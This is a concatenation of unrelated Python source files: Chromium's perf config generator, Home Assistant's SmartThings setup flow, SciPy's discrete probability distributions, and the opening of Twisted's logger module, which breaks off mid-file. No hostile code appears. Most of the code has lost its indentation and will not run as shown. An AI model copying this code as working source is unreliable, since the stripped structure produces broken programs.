# TODO(crbug.com/1078675): remove this setting
if 'perf_processor' in condensed_config:
config['merge'] = {
'script': '//tools/perf/process_perf_results.py',
}
config['merge']['args'] = ['--lightweight']
condensed_tests = condensed_config.get('tests')
if condensed_tests:
gtest_tests = []
telemetry_tests = []
other_tests = []
for test in condensed_tests:
generated_script = generate_performance_test(
condensed_config, test, builder_name)
test_type = test.get('type', TEST_TYPES.TELEMETRY)
if test_type == TEST_TYPES.GTEST:
gtest_tests.append(generated_script)
elif test_type == TEST_TYPES.TELEMETRY:
telemetry_tests.append(generated_script)
elif test_type == TEST_TYPES.GENERIC:
other_tests.append(generated_script)
else:
raise ValueError(
'perf_data_generator.py does not understand test type %s.'
% test_type)
gtest_tests.sort(key=lambda x: x['name'])
telemetry_tests.sort(key=lambda x: x['name'])
other_tests.sort(key=lambda x: x['name'])
# Put Telemetry tests at the end since they tend to run longer, to avoid
# starving gtests (see crbug.com/873389).
config['isolated_scripts'] = gtest_tests + telemetry_tests + other_tests
return config
# List of all updater functions and the file they generate. The updater
# functions must return True on success and False otherwise. File paths are
# relative to chromium src and should use posix path separators (i.e. '/').
ALL_UPDATERS_AND_FILES = [
(update_all_builders, 'testing/buildbot/chromium.perf.json'),
(update_all_fyi_builders, 'testing/buildbot/chromium.perf.fyi.json'),
(update_all_calibration_builders,
'testing/buildbot/chromium.perf.calibration.json'),
(update_benchmark_csv, 'tools/perf/benchmark.csv'),
(update_system_health_stories, 'tools/perf/system_health_stories.csv'),
(update_labs_docs_md, 'docs/speed/perf_lab_platforms.md'),
]
def _source_filepath(posix_path):
return os.path.join(path_util.GetChromiumSrcDir(), *posix_path.split('/'))
def validate_all_files():
"""Validate all generated files."""
tempdir = tempfile.mkdtemp()
try:
for run_updater, src_file in ALL_UPDATERS_AND_FILES:
real_filepath = _source_filepath(src_file)
temp_filepath = os.path.join(tempdir, os.path.basename(real_filepath))
if not (os.path.exists(real_filepath) and
run_updater(temp_filepath) and
filecmp.cmp(temp_filepath, real_filepath)):
return False
finally:
shutil.rmtree(tempdir)
return True
def update_all_files():
"""Update all generated files."""
for run_updater, src_file in ALL_UPDATERS_AND_FILES:
if not run_updater(_source_filepath(src_file)):
print('Failed updating:', src_file)
return False
print('Updated:', src_file)
return True
def main(args):
parser = argparse.ArgumentParser(
      description=('Generate perf tests\' json config and benchmark.csv. '
                   'This needs to be done anytime you add/remove any existing '
                   'benchmarks in tools/perf/benchmarks.'))
parser.add_argument(
'--validate-only', action='store_true', default=False,
      help=('Validate whether the perf json generated will be the same as the '
            'existing configs. This does not change the content of existing '
            'configs.'))
options = parser.parse_args(args)
if options.validate_only:
if validate_all_files():
print('All the perf config files are up-to-date. \\o/')
return 0
else:
print('Not all perf config files are up-to-date. Please run %s '
'to update them.' % sys.argv[0])
return 1
else:
return 0 if update_all_files() else 1
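# Usage sketch (invocation only; the flag comes from the parser above and the
# return codes from main()):
#
#   perf_data_generator.py                  # regenerate every file in ALL_UPDATERS_AND_FILES
#   perf_data_generator.py --validate-only  # return 1 if any generated file is stale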
|
|
"""Config flow to configure SmartThings."""
import logging
from aiohttp import ClientResponseError
from pysmartthings import APIResponseError, AppOAuth, SmartThings
from pysmartthings.installedapp import format_install_url
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import (
CONF_ACCESS_TOKEN,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
HTTP_FORBIDDEN,
HTTP_UNAUTHORIZED,
)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import (
APP_OAUTH_CLIENT_NAME,
APP_OAUTH_SCOPES,
CONF_APP_ID,
CONF_INSTALLED_APP_ID,
CONF_LOCATION_ID,
CONF_REFRESH_TOKEN,
DOMAIN,
VAL_UID_MATCHER,
)
from .smartapp import (
create_app,
find_app,
format_unique_id,
get_webhook_url,
setup_smartapp,
setup_smartapp_endpoint,
update_app,
validate_webhook_requirements,
)
_LOGGER = logging.getLogger(__name__)
class SmartThingsFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle configuration of SmartThings integrations."""
VERSION = 2
def __init__(self):
"""Create a new instance of the flow handler."""
self.access_token = None
self.app_id = None
self.api = None
self.oauth_client_secret = None
self.oauth_client_id = None
self.installed_app_id = None
self.refresh_token = None
self.location_id = None
async def async_step_import(self, user_input=None):
"""Occurs when a previously entry setup fails and is re-initiated."""
return await self.async_step_user(user_input)
async def async_step_user(self, user_input=None):
"""Validate and confirm webhook setup."""
await setup_smartapp_endpoint(self.hass)
webhook_url = get_webhook_url(self.hass)
# Abort if the webhook is invalid
if not validate_webhook_requirements(self.hass):
return self.async_abort(
reason="invalid_webhook_url",
description_placeholders={
"webhook_url": webhook_url,
"component_url": "https://www.home-assistant.io/integrations/smartthings/",
},
)
# Show the confirmation
if user_input is None:
return self.async_show_form(
step_id="user",
description_placeholders={"webhook_url": webhook_url},
)
# Show the next screen
return await self.async_step_pat()
async def async_step_pat(self, user_input=None):
"""Get the Personal Access Token and validate it."""
errors = {}
if user_input is None or CONF_ACCESS_TOKEN not in user_input:
return self._show_step_pat(errors)
self.access_token = user_input[CONF_ACCESS_TOKEN]
# Ensure token is a UUID
if not VAL_UID_MATCHER.match(self.access_token):
errors[CONF_ACCESS_TOKEN] = "token_invalid_format"
return self._show_step_pat(errors)
# Setup end-point
self.api = SmartThings(async_get_clientsession(self.hass), self.access_token)
try:
app = await find_app(self.hass, self.api)
if app:
await app.refresh() # load all attributes
await update_app(self.hass, app)
# Find an existing entry to copy the oauth client
existing = next(
(
entry
for entry in self._async_current_entries()
if entry.data[CONF_APP_ID] == app.app_id
),
None,
)
if existing:
self.oauth_client_id = existing.data[CONF_CLIENT_ID]
self.oauth_client_secret = existing.data[CONF_CLIENT_SECRET]
else:
# Get oauth client id/secret by regenerating it
app_oauth = AppOAuth(app.app_id)
app_oauth.client_name = APP_OAUTH_CLIENT_NAME
app_oauth.scope.extend(APP_OAUTH_SCOPES)
client = await self.api.generate_app_oauth(app_oauth)
self.oauth_client_secret = client.client_secret
self.oauth_client_id = client.client_id
else:
app, client = await create_app(self.hass, self.api)
self.oauth_client_secret = client.client_secret
self.oauth_client_id = client.client_id
setup_smartapp(self.hass, app)
self.app_id = app.app_id
except APIResponseError as ex:
if ex.is_target_error():
errors["base"] = "webhook_error"
else:
errors["base"] = "app_setup_error"
_LOGGER.exception(
"API error setting up the SmartApp: %s", ex.raw_error_response
)
return self._show_step_pat(errors)
except ClientResponseError as ex:
if ex.status == HTTP_UNAUTHORIZED:
errors[CONF_ACCESS_TOKEN] = "token_unauthorized"
_LOGGER.debug(
"Unauthorized error received setting up SmartApp", exc_info=True
)
elif ex.status == HTTP_FORBIDDEN:
errors[CONF_ACCESS_TOKEN] = "token_forbidden"
_LOGGER.debug(
"Forbidden error received setting up SmartApp", exc_info=True
)
else:
errors["base"] = "app_setup_error"
_LOGGER.exception("Unexpected error setting up the SmartApp")
return self._show_step_pat(errors)
except Exception: # pylint:disable=broad-except
errors["base"] = "app_setup_error"
_LOGGER.exception("Unexpected error setting up the SmartApp")
return self._show_step_pat(errors)
return await self.async_step_select_location()
async def async_step_select_location(self, user_input=None):
"""Ask user to select the location to setup."""
if user_input is None or CONF_LOCATION_ID not in user_input:
# Get available locations
existing_locations = [
entry.data[CONF_LOCATION_ID] for entry in self._async_current_entries()
]
locations = await self.api.locations()
locations_options = {
location.location_id: location.name
for location in locations
if location.location_id not in existing_locations
}
if not locations_options:
return self.async_abort(reason="no_available_locations")
return self.async_show_form(
step_id="select_location",
data_schema=vol.Schema(
{vol.Required(CONF_LOCATION_ID): vol.In(locations_options)}
),
)
self.location_id = user_input[CONF_LOCATION_ID]
await self.async_set_unique_id(format_unique_id(self.app_id, self.location_id))
return await self.async_step_authorize()
async def async_step_authorize(self, user_input=None):
"""Wait for the user to authorize the app installation."""
user_input = {} if user_input is None else user_input
self.installed_app_id = user_input.get(CONF_INSTALLED_APP_ID)
self.refresh_token = user_input.get(CONF_REFRESH_TOKEN)
if self.installed_app_id is None:
# Launch the external setup URL
url = format_install_url(self.app_id, self.location_id)
return self.async_external_step(step_id="authorize", url=url)
return self.async_external_step_done(next_step_id="install")
def _show_step_pat(self, errors):
if self.access_token is None:
            # Get the token from an existing entry to make it easier to set up multiple locations.
self.access_token = next(
(
entry.data.get(CONF_ACCESS_TOKEN)
for entry in self._async_current_entries()
),
None,
)
return self.async_show_form(
step_id="pat",
data_schema=vol.Schema(
{vol.Required(CONF_ACCESS_TOKEN, default=self.access_token): str}
),
errors=errors,
description_placeholders={
"token_url": "https://account.smartthings.com/tokens",
"component_url": "https://www.home-assistant.io/integrations/smartthings/",
},
)
async def async_step_install(self, data=None):
"""Create a config entry at completion of a flow and authorization of the app."""
data = {
CONF_ACCESS_TOKEN: self.access_token,
CONF_REFRESH_TOKEN: self.refresh_token,
CONF_CLIENT_ID: self.oauth_client_id,
CONF_CLIENT_SECRET: self.oauth_client_secret,
CONF_LOCATION_ID: self.location_id,
CONF_APP_ID: self.app_id,
CONF_INSTALLED_APP_ID: self.installed_app_id,
}
location = await self.api.location(data[CONF_LOCATION_ID])
return self.async_create_entry(title=location.name, data=data)
|
|
#
# Author: Travis Oliphant 2002-2011 with contributions from
# SciPy Developers 2004-2011
#
from __future__ import division, print_function, absolute_import
from scipy import special
from scipy.special import entr, gammaln as gamln
from numpy import floor, ceil, log, exp, sqrt, log1p, expm1, tanh, cosh, sinh
import numpy as np
import numpy.random as mtrand
from ._distn_infrastructure import (
rv_discrete, _lazywhere, _ncx2_pdf, _ncx2_cdf, get_distribution_names)
class binom_gen(rv_discrete):
"""A binomial discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `binom` is::
binom.pmf(k) = choose(n, k) * p**k * (1-p)**(n-k)
for ``k`` in ``{0, 1,..., n}``.
`binom` takes ``n`` and ``p`` as shape parameters.
%(example)s
"""
def _rvs(self, n, p):
return mtrand.binomial(n, p, self._size)
def _argcheck(self, n, p):
self.b = n
return (n >= 0) & (p >= 0) & (p <= 1)
def _logpmf(self, x, n, p):
k = floor(x)
combiln = (gamln(n+1) - (gamln(k+1) + gamln(n-k+1)))
return combiln + special.xlogy(k, p) + special.xlog1py(n-k, -p)
def _pmf(self, x, n, p):
return exp(self._logpmf(x, n, p))
def _cdf(self, x, n, p):
k = floor(x)
vals = special.bdtr(k, n, p)
return vals
def _sf(self, x, n, p):
k = floor(x)
return special.bdtrc(k, n, p)
def _ppf(self, q, n, p):
vals = ceil(special.bdtrik(q, n, p))
vals1 = np.maximum(vals - 1, 0)
temp = special.bdtr(vals1, n, p)
return np.where(temp >= q, vals1, vals)
def _stats(self, n, p, moments='mv'):
q = 1.0 - p
mu = n * p
var = n * p * q
g1, g2 = None, None
if 's' in moments:
g1 = (q - p) / sqrt(var)
if 'k' in moments:
g2 = (1.0 - 6*p*q) / var
return mu, var, g1, g2
def _entropy(self, n, p):
k = np.r_[0:n + 1]
vals = self._pmf(k, n, p)
return np.sum(entr(vals), axis=0)
binom = binom_gen(name='binom')
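# Illustrative check of the `binom` pmf formula documented above; a minimal
# sketch using only the public scipy.stats API, not part of this module's
# machinery:
#
#   >>> from scipy.stats import binom
#   >>> from math import factorial
#   >>> n, p, k = 10, 0.3, 4
#   >>> choose = factorial(n) // (factorial(k) * factorial(n - k))
#   >>> abs(binom.pmf(k, n, p) - choose * p**k * (1 - p)**(n - k)) < 1e-12
#   True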
class bernoulli_gen(binom_gen):
"""A Bernoulli discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `bernoulli` is::
bernoulli.pmf(k) = 1-p if k = 0
= p if k = 1
for ``k`` in ``{0, 1}``.
`bernoulli` takes ``p`` as shape parameter.
%(example)s
"""
def _rvs(self, p):
return binom_gen._rvs(self, 1, p)
def _argcheck(self, p):
return (p >= 0) & (p <= 1)
def _logpmf(self, x, p):
return binom._logpmf(x, 1, p)
def _pmf(self, x, p):
return binom._pmf(x, 1, p)
def _cdf(self, x, p):
return binom._cdf(x, 1, p)
def _sf(self, x, p):
return binom._sf(x, 1, p)
def _ppf(self, q, p):
return binom._ppf(q, 1, p)
def _stats(self, p):
return binom._stats(1, p)
def _entropy(self, p):
return entr(p) + entr(1-p)
bernoulli = bernoulli_gen(b=1, name='bernoulli')
class nbinom_gen(rv_discrete):
"""A negative binomial discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `nbinom` is::
nbinom.pmf(k) = choose(k+n-1, n-1) * p**n * (1-p)**k
for ``k >= 0``.
`nbinom` takes ``n`` and ``p`` as shape parameters.
%(example)s
"""
def _rvs(self, n, p):
return mtrand.negative_binomial(n, p, self._size)
def _argcheck(self, n, p):
return (n > 0) & (p >= 0) & (p <= 1)
def _pmf(self, x, n, p):
return exp(self._logpmf(x, n, p))
def _logpmf(self, x, n, p):
coeff = gamln(n+x) - gamln(x+1) - gamln(n)
return coeff + n*log(p) + special.xlog1py(x, -p)
def _cdf(self, x, n, p):
k = floor(x)
return special.betainc(n, k+1, p)
def _sf_skip(self, x, n, p):
# skip because special.nbdtrc doesn't work for 0<n<1
k = floor(x)
return special.nbdtrc(k, n, p)
def _ppf(self, q, n, p):
vals = ceil(special.nbdtrik(q, n, p))
vals1 = (vals-1).clip(0.0, np.inf)
temp = self._cdf(vals1, n, p)
return np.where(temp >= q, vals1, vals)
def _stats(self, n, p):
Q = 1.0 / p
P = Q - 1.0
mu = n*P
var = n*P*Q
g1 = (Q+P)/sqrt(n*P*Q)
g2 = (1.0 + 6*P*Q) / (n*P*Q)
return mu, var, g1, g2
nbinom = nbinom_gen(name='nbinom')
class geom_gen(rv_discrete):
"""A geometric discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `geom` is::
geom.pmf(k) = (1-p)**(k-1)*p
for ``k >= 1``.
`geom` takes ``p`` as shape parameter.
%(example)s
"""
def _rvs(self, p):
return mtrand.geometric(p, size=self._size)
def _argcheck(self, p):
return (p <= 1) & (p >= 0)
def _pmf(self, k, p):
return np.power(1-p, k-1) * p
def _logpmf(self, k, p):
return (k-1) * log(1-p) + log(p)
def _cdf(self, x, p):
k = floor(x)
return -expm1(log1p(-p)*k)
def _sf(self, x, p):
return np.exp(self._logsf(x, p))
def _logsf(self, x, p):
k = floor(x)
return k*log1p(-p)
def _ppf(self, q, p):
vals = ceil(log(1.0-q)/log(1-p))
temp = self._cdf(vals-1, p)
return np.where((temp >= q) & (vals > 0), vals-1, vals)
def _stats(self, p):
mu = 1.0/p
qr = 1.0-p
var = qr / p / p
g1 = (2.0-p) / sqrt(qr)
g2 = np.polyval([1, -6, 6], p)/(1.0-p)
return mu, var, g1, g2
geom = geom_gen(a=1, name='geom', longname="A geometric")
class hypergeom_gen(rv_discrete):
"""A hypergeometric discrete random variable.
The hypergeometric distribution models drawing objects from a bin.
M is the total number of objects, n is total number of Type I objects.
The random variate represents the number of Type I objects in N drawn
without replacement from the total population.
%(before_notes)s
Notes
-----
The probability mass function is defined as::
pmf(k, M, n, N) = choose(n, k) * choose(M - n, N - k) / choose(M, N),
for max(0, N - (M-n)) <= k <= min(n, N)
Examples
--------
>>> from scipy.stats import hypergeom
>>> import matplotlib.pyplot as plt
Suppose we have a collection of 20 animals, of which 7 are dogs. Then if
we want to know the probability of finding a given number of dogs if we
choose at random 12 of the 20 animals, we can initialize a frozen
distribution and plot the probability mass function:
>>> [M, n, N] = [20, 7, 12]
>>> rv = hypergeom(M, n, N)
>>> x = np.arange(0, n+1)
>>> pmf_dogs = rv.pmf(x)
>>> fig = plt.figure()
>>> ax = fig.add_subplot(111)
>>> ax.plot(x, pmf_dogs, 'bo')
>>> ax.vlines(x, 0, pmf_dogs, lw=2)
>>> ax.set_xlabel('# of dogs in our group of chosen animals')
>>> ax.set_ylabel('hypergeom PMF')
>>> plt.show()
Instead of using a frozen distribution we can also use `hypergeom`
methods directly. To for example obtain the cumulative distribution
function, use:
>>> prb = hypergeom.cdf(x, M, n, N)
And to generate random numbers:
>>> R = hypergeom.rvs(M, n, N, size=10)
"""
def _rvs(self, M, n, N):
return mtrand.hypergeometric(n, M-n, N, size=self._size)
def _argcheck(self, M, n, N):
cond = rv_discrete._argcheck(self, M, n, N)
cond &= (n <= M) & (N <= M)
self.a = max(N-(M-n), 0)
self.b = min(n, N)
return cond
def _logpmf(self, k, M, n, N):
tot, good = M, n
bad = tot - good
return gamln(good+1) - gamln(good-k+1) - gamln(k+1) + gamln(bad+1) \
- gamln(bad-N+k+1) - gamln(N-k+1) - gamln(tot+1) + gamln(tot-N+1) \
+ gamln(N+1)
def _pmf(self, k, M, n, N):
# same as the following but numerically more precise
# return comb(good, k) * comb(bad, N-k) / comb(tot, N)
return exp(self._logpmf(k, M, n, N))
def _stats(self, M, n, N):
# tot, good, sample_size = M, n, N
# "wikipedia".replace('N', 'M').replace('n', 'N').replace('K', 'n')
M, n, N = 1.*M, 1.*n, 1.*N
m = M - n
p = n/M
mu = N*p
var = m*n*N*(M - N)*1.0/(M*M*(M-1))
g1 = (m - n)*(M-2*N) / (M-2.0) * sqrt((M-1.0) / (m*n*N*(M-N)))
g2 = M*(M+1) - 6.*N*(M-N) - 6.*n*m
g2 *= (M-1)*M*M
g2 += 6.*n*N*(M-N)*m*(5.*M-6)
g2 /= n * N * (M-N) * m * (M-2.) * (M-3.)
return mu, var, g1, g2
def _entropy(self, M, n, N):
k = np.r_[N - (M - n):min(n, N) + 1]
vals = self.pmf(k, M, n, N)
return np.sum(entr(vals), axis=0)
def _sf(self, k, M, n, N):
"""More precise calculation, 1 - cdf doesn't cut it."""
# This for loop is needed because `k` can be an array. If that's the
# case, the sf() method makes M, n and N arrays of the same shape. We
# therefore unpack all inputs args, so we can do the manual
# integration.
res = []
for quant, tot, good, draw in zip(k, M, n, N):
# Manual integration over probability mass function. More accurate
# than integrate.quad.
k2 = np.arange(quant + 1, draw + 1)
res.append(np.sum(self._pmf(k2, tot, good, draw)))
return np.asarray(res)
hypergeom = hypergeom_gen(name='hypergeom')
# FIXME: Fails _cdfvec
class logser_gen(rv_discrete):
"""A Logarithmic (Log-Series, Series) discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `logser` is::
logser.pmf(k) = - p**k / (k*log(1-p))
for ``k >= 1``.
`logser` takes ``p`` as shape parameter.
%(example)s
"""
def _rvs(self, p):
# looks wrong for p>0.5, too few k=1
# trying to use generic is worse, no k=1 at all
return mtrand.logseries(p, size=self._size)
def _argcheck(self, p):
return (p > 0) & (p < 1)
def _pmf(self, k, p):
return -np.power(p, k) * 1.0 / k / log(1 - p)
def _stats(self, p):
r = log(1 - p)
mu = p / (p - 1.0) / r
mu2p = -p / r / (p - 1.0)**2
var = mu2p - mu*mu
mu3p = -p / r * (1.0+p) / (1.0 - p)**3
mu3 = mu3p - 3*mu*mu2p + 2*mu**3
g1 = mu3 / np.power(var, 1.5)
mu4p = -p / r * (
1.0 / (p-1)**2 - 6*p / (p - 1)**3 + 6*p*p / (p-1)**4)
mu4 = mu4p - 4*mu3p*mu + 6*mu2p*mu*mu - 3*mu**4
g2 = mu4 / var**2 - 3.0
return mu, var, g1, g2
logser = logser_gen(a=1, name='logser', longname='A logarithmic')
class poisson_gen(rv_discrete):
"""A Poisson discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `poisson` is::
poisson.pmf(k) = exp(-mu) * mu**k / k!
for ``k >= 0``.
`poisson` takes ``mu`` as shape parameter.
%(example)s
"""
def _rvs(self, mu):
return mtrand.poisson(mu, self._size)
def _logpmf(self, k, mu):
Pk = k*log(mu)-gamln(k+1) - mu
return Pk
def _pmf(self, k, mu):
return exp(self._logpmf(k, mu))
def _cdf(self, x, mu):
k = floor(x)
return special.pdtr(k, mu)
def _sf(self, x, mu):
k = floor(x)
return special.pdtrc(k, mu)
def _ppf(self, q, mu):
vals = ceil(special.pdtrik(q, mu))
vals1 = np.maximum(vals - 1, 0)
temp = special.pdtr(vals1, mu)
return np.where(temp >= q, vals1, vals)
def _stats(self, mu):
var = mu
tmp = np.asarray(mu)
g1 = sqrt(1.0 / tmp)
g2 = 1.0 / tmp
return mu, var, g1, g2
poisson = poisson_gen(name="poisson", longname='A Poisson')
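# Illustrative check of the `poisson` pmf above and of the mean == variance
# property implied by _stats (a sketch, not part of the library machinery):
#
#   >>> from scipy.stats import poisson
#   >>> from math import exp, factorial
#   >>> mu, k = 2.5, 3
#   >>> abs(poisson.pmf(k, mu) - exp(-mu) * mu**k / factorial(k)) < 1e-12
#   True
#   >>> abs(poisson.mean(mu) - poisson.var(mu)) < 1e-12
#   True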
class planck_gen(rv_discrete):
"""A Planck discrete exponential random variable.
%(before_notes)s
Notes
-----
The probability mass function for `planck` is::
planck.pmf(k) = (1-exp(-lambda_))*exp(-lambda_*k)
for ``k*lambda_ >= 0``.
`planck` takes ``lambda_`` as shape parameter.
%(example)s
"""
def _argcheck(self, lambda_):
if (lambda_ > 0):
self.a = 0
self.b = np.inf
return 1
elif (lambda_ < 0):
self.a = -np.inf
self.b = 0
return 1
else:
return 0
def _pmf(self, k, lambda_):
fact = (1-exp(-lambda_))
return fact*exp(-lambda_*k)
def _cdf(self, x, lambda_):
k = floor(x)
return 1-exp(-lambda_*(k+1))
def _ppf(self, q, lambda_):
vals = ceil(-1.0/lambda_ * log1p(-q)-1)
vals1 = (vals-1).clip(self.a, np.inf)
temp = self._cdf(vals1, lambda_)
return np.where(temp >= q, vals1, vals)
def _stats(self, lambda_):
mu = 1/(exp(lambda_)-1)
var = exp(-lambda_)/(expm1(-lambda_))**2
g1 = 2*cosh(lambda_/2.0)
g2 = 4+2*cosh(lambda_)
return mu, var, g1, g2
def _entropy(self, lambda_):
l = lambda_
C = (1-exp(-l))
return l*exp(-l)/C - log(C)
planck = planck_gen(name='planck', longname='A discrete exponential ')
class boltzmann_gen(rv_discrete):
"""A Boltzmann (Truncated Discrete Exponential) random variable.
%(before_notes)s
Notes
-----
The probability mass function for `boltzmann` is::
        boltzmann.pmf(k) = (1-exp(-lambda_))*exp(-lambda_*k)/(1-exp(-lambda_*N))
for ``k = 0,..., N-1``.
`boltzmann` takes ``lambda_`` and ``N`` as shape parameters.
%(example)s
"""
def _pmf(self, k, lambda_, N):
fact = (1-exp(-lambda_))/(1-exp(-lambda_*N))
return fact*exp(-lambda_*k)
def _cdf(self, x, lambda_, N):
k = floor(x)
return (1-exp(-lambda_*(k+1)))/(1-exp(-lambda_*N))
def _ppf(self, q, lambda_, N):
qnew = q*(1-exp(-lambda_*N))
vals = ceil(-1.0/lambda_ * log(1-qnew)-1)
vals1 = (vals-1).clip(0.0, np.inf)
temp = self._cdf(vals1, lambda_, N)
return np.where(temp >= q, vals1, vals)
def _stats(self, lambda_, N):
z = exp(-lambda_)
zN = exp(-lambda_*N)
mu = z/(1.0-z)-N*zN/(1-zN)
var = z/(1.0-z)**2 - N*N*zN/(1-zN)**2
trm = (1-zN)/(1-z)
trm2 = (z*trm**2 - N*N*zN)
g1 = z*(1+z)*trm**3 - N**3*zN*(1+zN)
g1 = g1 / trm2**(1.5)
g2 = z*(1+4*z+z*z)*trm**4 - N**4 * zN*(1+4*zN+zN*zN)
g2 = g2 / trm2 / trm2
return mu, var, g1, g2
boltzmann = boltzmann_gen(name='boltzmann',
longname='A truncated discrete exponential ')
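# Sanity check that the truncated pmf above sums to one over its support
# ``k = 0, ..., N-1`` (a sketch using only the public API):
#
#   >>> import numpy as np
#   >>> from scipy.stats import boltzmann
#   >>> lam, N = 0.5, 10
#   >>> abs(boltzmann.pmf(np.arange(N), lam, N).sum() - 1.0) < 1e-12
#   True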
class randint_gen(rv_discrete):
"""A uniform discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `randint` is::
randint.pmf(k) = 1./(high - low)
for ``k = low, ..., high - 1``.
`randint` takes ``low`` and ``high`` as shape parameters.
Note the difference to the numpy ``random_integers`` which
returns integers on a *closed* interval ``[low, high]``.
%(example)s
"""
def _argcheck(self, low, high):
self.a = low
self.b = high - 1
return (high > low)
def _pmf(self, k, low, high):
p = np.ones_like(k) / (high - low)
return np.where((k >= low) & (k < high), p, 0.)
def _cdf(self, x, low, high):
k = floor(x)
return (k - low + 1.) / (high - low)
def _ppf(self, q, low, high):
vals = ceil(q * (high - low) + low) - 1
vals1 = (vals - 1).clip(low, high)
temp = self._cdf(vals1, low, high)
return np.where(temp >= q, vals1, vals)
def _stats(self, low, high):
m2, m1 = np.asarray(high), np.asarray(low)
mu = (m2 + m1 - 1.0) / 2
d = m2 - m1
var = (d*d - 1) / 12.0
g1 = 0.0
g2 = -6.0/5.0 * (d*d + 1.0) / (d*d - 1.0)
return mu, var, g1, g2
def _rvs(self, low, high=None):
"""An array of *size* random integers >= ``low`` and < ``high``.
If ``high`` is ``None``, then range is >=0 and < low
"""
return mtrand.randint(low, high, self._size)
def _entropy(self, low, high):
return log(high - low)
randint = randint_gen(name='randint', longname='A discrete uniform '
'(random integer)')
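# Illustrative check of the half-open support noted above: ``high`` itself is
# excluded (a sketch, not library code):
#
#   >>> from scipy.stats import randint
#   >>> low, high = 2, 5            # support is {2, 3, 4}
#   >>> float(randint.pmf(4, low, high)), float(randint.pmf(5, low, high))
#   (0.3333333333333333, 0.0)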
# FIXME: problems sampling.
class zipf_gen(rv_discrete):
"""A Zipf discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `zipf` is::
zipf.pmf(k, a) = 1/(zeta(a) * k**a)
for ``k >= 1``.
`zipf` takes ``a`` as shape parameter.
%(example)s
"""
def _rvs(self, a):
return mtrand.zipf(a, size=self._size)
def _argcheck(self, a):
return a > 1
def _pmf(self, k, a):
Pk = 1.0 / special.zeta(a, 1) / k**a
return Pk
def _munp(self, n, a):
return _lazywhere(
a > n + 1, (a, n),
lambda a, n: special.zeta(a - n, 1) / special.zeta(a, 1),
np.inf)
zipf = zipf_gen(a=1, name='zipf', longname='A Zipf')
class dlaplace_gen(rv_discrete):
"""A Laplacian discrete random variable.
%(before_notes)s
Notes
-----
The probability mass function for `dlaplace` is::
dlaplace.pmf(k) = tanh(a/2) * exp(-a*abs(k))
for ``a > 0``.
`dlaplace` takes ``a`` as shape parameter.
%(example)s
"""
def _pmf(self, k, a):
return tanh(a/2.0) * exp(-a * abs(k))
def _cdf(self, x, a):
k = floor(x)
f = lambda k, a: 1.0 - exp(-a * k) / (exp(a) + 1)
f2 = lambda k, a: exp(a * (k+1)) / (exp(a) + 1)
return _lazywhere(k >= 0, (k, a), f=f, f2=f2)
def _ppf(self, q, a):
const = 1 + exp(a)
vals = ceil(np.where(q < 1.0 / (1 + exp(-a)), log(q*const) / a - 1,
-log((1-q) * const) / a))
vals1 = vals - 1
return np.where(self._cdf(vals1, a) >= q, vals1, vals)
def _stats(self, a):
ea = exp(a)
mu2 = 2.*ea/(ea-1.)**2
mu4 = 2.*ea*(ea**2+10.*ea+1.) / (ea-1.)**4
return 0., mu2, 0., mu4/mu2**2 - 3.
def _entropy(self, a):
return a / sinh(a) - log(tanh(a/2.0))
dlaplace = dlaplace_gen(a=-np.inf,
name='dlaplace', longname='A discrete Laplacian')
class skellam_gen(rv_discrete):
"""A Skellam discrete random variable.
%(before_notes)s
Notes
-----
Probability distribution of the difference of two correlated or
uncorrelated Poisson random variables.
Let k1 and k2 be two Poisson-distributed r.v. with expected values
lam1 and lam2. Then, ``k1 - k2`` follows a Skellam distribution with
parameters ``mu1 = lam1 - rho*sqrt(lam1*lam2)`` and
``mu2 = lam2 - rho*sqrt(lam1*lam2)``, where rho is the correlation
coefficient between k1 and k2. If the two Poisson-distributed r.v.
are independent then ``rho = 0``.
Parameters mu1 and mu2 must be strictly positive.
For details see: http://en.wikipedia.org/wiki/Skellam_distribution
`skellam` takes ``mu1`` and ``mu2`` as shape parameters.
%(example)s
"""
def _rvs(self, mu1, mu2):
n = self._size
return mtrand.poisson(mu1, n) - mtrand.poisson(mu2, n)
def _pmf(self, x, mu1, mu2):
px = np.where(x < 0,
_ncx2_pdf(2*mu2, 2*(1-x), 2*mu1)*2,
_ncx2_pdf(2*mu1, 2*(1+x), 2*mu2)*2)
# ncx2.pdf() returns nan's for extremely low probabilities
return px
def _cdf(self, x, mu1, mu2):
x = floor(x)
px = np.where(x < 0,
_ncx2_cdf(2*mu2, -2*x, 2*mu1),
1-_ncx2_cdf(2*mu1, 2*(x+1), 2*mu2))
return px
def _stats(self, mu1, mu2):
mean = mu1 - mu2
var = mu1 + mu2
g1 = mean / sqrt((var)**3)
g2 = 1 / var
return mean, var, g1, g2
skellam = skellam_gen(a=-np.inf, name="skellam", longname='A Skellam')
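# Illustrative check of the Skellam moments (mean = mu1 - mu2 and
# variance = mu1 + mu2); a sketch, not part of this module:
#
#   >>> from scipy.stats import skellam
#   >>> mu1, mu2 = 3.0, 1.5
#   >>> float(skellam.mean(mu1, mu2)), float(skellam.var(mu1, mu2))
#   (1.5, 4.5)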
# Collect names of classes and objects in this module.
pairs = list(globals().items())
_distn_names, _distn_gen_names = get_distribution_names(pairs, rv_discrete)
__all__ = _distn_names + _distn_gen_names
|
|
# -*- test-case-name: twisted.logger.test.test_global -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module includes process-global state associated with the logging system,
and implementation of logic for managing that global state.
"""
import sys
import warnings
from twisted.python.compat import currentframe
from twisted.python.reflect import qual
from ._buffer import LimitedHistoryLogObserver
from ._observer import LogPublisher
from ._filter import FilteringLogObserver, LogLevelFilterPredicate
from ._logger import Logger
from ._format import formatEvent
from ._levels import LogLevel
from ._io import LoggingFile
from ._file import FileLogObserver
MORE_THAN_ONCE_WARNING = (
"Warning: primary log target selected twice at <{fileNow}:{lineNow}> - "
"previously selected at <{fileThen:logThen}>. Remove one of the calls to "
"beginLoggingTo."
)
class LogBeginner(object):
"""
